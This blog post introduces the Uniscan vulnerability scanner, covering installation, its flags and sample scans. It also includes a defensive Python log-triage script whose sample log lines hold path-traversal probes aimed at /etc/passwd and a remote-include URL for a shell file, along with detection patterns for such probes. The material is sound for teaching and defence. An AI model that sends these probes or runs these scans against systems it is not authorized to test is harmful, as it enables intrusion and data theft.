
SecurityTrails Blog · Nov 09 · by Esteban Borges

Uniscan: An RFI, LFI, and RCE Vulnerability Scanner


When scanning remote hosts and web applications, the danger of file inclusion attacks is an important consideration, particularly when dealing with web applications that support plugins such as WordPress.

An RFI, or remote file inclusion attack, targets web applications that include code from external scripts (commonly known as application plugins), hooks, themes, or anything else that is dynamically included into the web application at runtime.

If any of these includes contain vulnerabilities, exploiting them is very likely to make the main web application exploitable as well.

That’s why today we’ll take a look at the Uniscan project. In the project’s own words, Uniscan is a simple Remote File Include, Local File Include, and Remote Command Execution vulnerability scanner.


Installation

We recommend using Kali Linux for Uniscan, as the tool is available there for easy installation via the package manager.

Installing Uniscan on Kali Linux is straightforward: it can be installed directly via the APT package manager, with no need to compile from source.

First, we update our APT package manager information with the following command:

apt update

Next, we proceed to install Uniscan:

apt install uniscan

[Screenshot: Uniscan installation]

To verify a successful Uniscan installation, let’s run the following command:

sudo uniscan

This should then return the following output, which displays the options/flags Uniscan has available:

[Screenshot: Uniscan options]

Configuration

Uniscan can run with minimal configuration, but it also allows a good amount of customization:

  • -h — The -h flag shows all the options available in Uniscan.
  • -u — The -u flag specifies the URL to be scanned, for example: https://www.example.com/
  • -f — If you wish to scan a list of URLs, you can put them into a text file and reference that file with the -f flag.
  • -b — Scans can take a while to complete if you have multiple URLs to scan. The -b flag makes Uniscan run in the background; alternatively, you can run Uniscan inside a “screen” session on Linux.
  • -q — The -q flag enables directory checks for the target being scanned.
  • -w — The -w flag enables Uniscan to check for files present on the remote host being scanned.
  • -e — The -e flag enables Uniscan to check for robots.txt and sitemap.xml, which can further help identify the type of script/web application running on the target host.
  • -d — The -d flag enables dynamic checks within Uniscan, which look for dynamic file includes.
  • -s — The -s flag enables static checks within Uniscan, which look for static file includes.
  • -r — The -r flag enables stress checks to be run against the target being scanned.
  • -i and -o — These flags perform Bing and Google searches for dorks related to the target being scanned.
  • -g — The -g flag is used for web fingerprinting. This helps identify which web application is running on the web server, which plugins are enabled (for example, in WordPress), which version of WordPress is running on the server, and more.
  • -j — The -j flag enables the server fingerprint check/listing, which allows identification of the server software. This performs actions such as ping, Nmap, traceroute, and listing of the web server and operating system running.

Testing and results

To run a basic scan on a web app, we use the combined flags -qweds (that is, -q -w -e -d -s), which instruct Uniscan to perform the following:

  • Directory checks (q)
  • File checks (w)
  • Robots/sitemap checks (e)
  • Dynamic file include checks (d)
  • Static file include checks (s)

All of these checks run in a single pass with the command:

sudo uniscan -u https://target.webapp.url -qweds

Note: Replace https://target.webapp.url with the actual URL you wish to scan.

Uniscan then returns the following output:

[Screenshot: Uniscan output]

As seen above, when directory and file checks are performed, Uniscan finds and lists the directories and files discovered on the target being scanned.

Next, Uniscan checks robots.txt and the sitemap, then begins enumerating every external host linked from the target being scanned:

[Screenshot: Uniscan external hosts enumeration]

Uniscan also lists email addresses found on the web application being scanned, as shown in the following screenshot:

[Screenshot: Uniscan emails list]

Then, Uniscan loads its plugins to perform the RFI (remote file inclusion) tests, along with XSS, SQL injection and other tests:

[Screenshot: Uniscan attack tests]

Last but not least, the web application is checked for any web shells, and the result is saved into an HTML-formatted report file:

[Screenshot: Uniscan web shells testing]
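Seen from the defender's side, the RFI and LFI probes that a scanner like Uniscan sends show up as suspicious parameter values in the web server's access log. The following Python script is an added example, not code from the original post or from Uniscan itself: it runs simple pattern checks over a few constructed Apache-style log lines (the addresses, paths and timestamps are made up).

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format log lines (not real traffic).
# Only the request field matters here; the rest is standard filler.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Nov/2021:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Nov/2021:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Nov/2021:10:00:03 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Nov/2021:10:00:04 +0000] "GET /index.php?page=http://203.0.113.9/shell.txt HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Nov/2021:10:00:05 +0000] "GET /blog/?p=42 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Extracts the method and request target from the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# LFI indicators: path traversal, null-byte truncation, PHP stream wrappers,
# and well-known local files that scanners try to read.
LFI_RE = re.compile(r'(\.\./|\.\.\\|\x00|php://|/etc/passwd|/proc/self/)', re.I)
# RFI indicator: a full URL, so the include would fetch a remote file.
RFI_RE = re.compile(r'^(https?|ftp)://', re.I)


def classify_value(value):
    """Label one decoded parameter value as 'rfi', 'lfi' or None (benign)."""
    if RFI_RE.search(value):
        return "rfi"
    if LFI_RE.search(value):
        return "lfi"
    return None


def scan_log(text):
    """Return (line_number, kind, parameter, value) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line; skip it
        query = urlsplit(m.group("target")).query
        # keep_blank_values so "?page=" style probes are still inspected;
        # a second unquote undoes double-encoded traversal sequences.
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = unquote(unquote(raw))
            kind = classify_value(value)
            if kind:
                hits.append((lineno, kind, name, value))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d: %s probe via %s=%r" % hit)
```

Feeding a real access log through scan_log gives a quick triage list; the patterns are deliberately broad, so treat the output as a starting point for review rather than a verdict.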

Running a web fingerprinting scan

Running a web fingerprinting scan is another handy Uniscan feature. This option tries to identify the web application being scanned and also runs other checks, such as capturing error information, WHOIS information, the language used, and interesting strings.

To run a web fingerprinting scan, we use the -g and -u flags:

sudo uniscan -g -u scanme.nmap.org

Which then returns the following results:

[Screenshot: Uniscan web fingerprinting scan]

Running a server fingerprinting scan

Similar to the web fingerprinting scan, the server fingerprinting scan is another key Uniscan feature. It runs a series of tests such as ping, traceroute, Nmap, and Nslookup.

To run a server fingerprinting scan, we use the -j and -u flags:

sudo uniscan -j -u scanme.nmap.org

Which then returns the following ping and traceroute results:

[Screenshot: Uniscan server fingerprinting scan]

Followed by the Nslookup results:

[Screenshot: Nslookup results]

And, most importantly, the Nmap results of every port discovered and probed:

[Screenshot: Nmap port scan]

Summary

While the project has not been actively developed for many years, it is still shipped in the Kali Linux repository and remains a good addition to any security analysis toolkit. The tool also provides other key features, such as stress checks and generation of the scan results as an HTML-formatted file.

Furthermore, Uniscan performs key fingerprinting functions. The web fingerprinting checks let you find out which version of a web application is running and which plugins are enabled. The server fingerprinting feature tells you more about the server itself, running Nmap scans, traceroutes and ping checks, and identifying the web server and operating system in use.

Last but not least, with its simple, painless install procedure and availability via the APT package manager on Kali Linux itself, Uniscan integrates easily into one’s security toolset.


Esteban is a seasoned security researcher and cybersecurity specialist with over 15 years of experience. Since joining SecurityTrails in 2017 he’s been our go-to for technical server security and source intelligence info.